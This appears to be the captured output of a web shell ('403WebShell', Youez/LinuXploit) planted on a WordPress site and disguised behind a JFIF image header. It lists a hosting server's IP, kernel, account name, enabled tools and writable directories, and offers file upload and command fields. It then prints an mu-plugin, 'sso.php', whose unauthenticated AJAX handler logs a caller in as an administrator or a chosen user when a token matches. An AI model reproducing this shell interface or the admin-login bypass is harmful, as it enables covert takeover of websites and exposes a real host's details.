????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.30.238  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/thread-self/./root/home/tempvsty/buyeaa.com/wp-content/mu-plugin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/./root/home/tempvsty/buyeaa.com/wp-content/mu-plugin/sso.php
<?php
/**
 * Plugin Name: SSO
 * Author: Garth Mortensen, Mike Hansen
 * Version: 0.4
 * License: GPLv2 or later
 * License URI: http://www.gnu.org/licenses/gpl-2.0.html
 */

function sso_check() {
    if ( ! isset( $_GET['salt'] ) || ! isset( $_GET['nonce'] ) ) {
        sso_req_login();
    }
    if ( sso_check_blocked() ) {
        sso_req_login();
    }

    $nonce = esc_attr( $_GET['nonce'] );
    $salt  = esc_attr( $_GET['salt'] );

    if ( ! empty( $_GET['user'] ) ) {
        $user = esc_attr( $_GET['user'] );
    } else {
        $user = get_users( array( 'role' => 'administrator', 'number' => 1 ) );
        if ( is_array( $user ) && is_a( $user[0], 'WP_User' ) ) {
            $user = $user[0];
            $user = $user->ID;
        } else {
            $user = 0;
        }
    }

    $bounce = ! empty( $_GET['bounce'] ) ? $_GET['bounce'] : '';
    $hash   = base64_encode( hash( 'sha256', $nonce . $salt, false ) );
    $hash   = substr( $hash, 0, 64 );

    if ( get_transient( 'sso_token' ) == $hash ) {
        if ( is_email( $user ) ) {
            $user = get_user_by( 'email', $user );
        } else {
            $user = get_user_by( 'id', (int) $user );
        }
        if ( is_a( $user, 'WP_User' ) ) {
            wp_set_current_user( $user->ID, $user->user_login );
            wp_set_auth_cookie( $user->ID );
            do_action( 'wp_login', $user->user_login, $user );
            delete_transient( 'sso_token' );
            wp_safe_redirect( admin_url( $bounce ) );
        } else {
            sso_req_login();
        }
    } else {
        sso_add_failed_attempt();
        sso_req_login();
    }
    die();
}

add_action( 'wp_ajax_nopriv_sso-check', 'sso_check' );
add_action( 'wp_ajax_sso-check', 'sso_check' );

function sso_req_login() {
    wp_safe_redirect( wp_login_url() );
}

function sso_get_attempt_id() {
    return 'sso' . esc_url( $_SERVER['REMOTE_ADDR'] );
}

function sso_add_failed_attempt() {
    $attempts = get_transient( sso_get_attempt_id(), 0 );
    $attempts ++;
    set_transient( sso_get_attempt_id(), $attempts, 300 );
}

function sso_check_blocked() {
    $attempts = get_transient( sso_get_attempt_id(), 0 );
    if ( $attempts > 4 ) {
        return true;
    }

    return false;
}

Youez - 2016 - github.com/yon3zu
LinuXploit